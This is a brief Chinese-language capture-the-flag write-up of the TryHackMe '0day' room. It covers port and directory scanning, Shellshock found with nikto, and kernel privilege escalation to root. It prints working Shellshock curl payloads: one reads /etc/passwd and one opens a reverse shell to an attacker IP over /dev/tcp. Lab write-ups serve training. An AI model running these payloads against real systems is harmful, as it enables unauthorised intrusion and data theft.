来源THM
0day
利用 Ubuntu,就像飓风中的乌龟一样
nmap端口扫描
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)
| 2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)
| 256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)
|_ 256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (EdDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 0day
只有22和80
gobuster目录扫描
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/backup (Status: 301)
/cgi-bin (Status: 301)
/cgi-bin/ (Status: 403)
/css (Status: 301)
/img (Status: 301)
/js (Status: 301)
/robots.txt (Status: 200)
/secret (Status: 301)
/server-status (Status: 403)
/uploads (Status: 301)
在/backup/目录下找到一个ssh文件,下载到本地用ssh2john破解
不过没什么用,没有用户名。
因为目录由cgi-bin,于是我想到了nikto进探测
+ /cgi-bin/test.cgi: Uncommon header '93e4r0-cve-2014-6271' found, with contents: true.
+ /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
出现了这样一条,并且可以访问
利用方式:
https://github.com/opsxcq/exploit-CVE-2014-6271
https://www.exploit-db.com/exploits/34900
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://10.10.47.227/cgi-bin/test.cgi
弹shell
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.13.18.193/1234 0>&1'" \
http://10.10.47.227/cgi-bin/test.cgi
特权升级
uname -a
ubuntu 3.13.0-32-generic
利用:https://www.exploit-db.com/exploits/37292
gcc: error trying to exec 'cc1': execvp: No such file or directory
其中需要给gcc配环境变量
export PATH=/usr/bin:$PATH
此时为root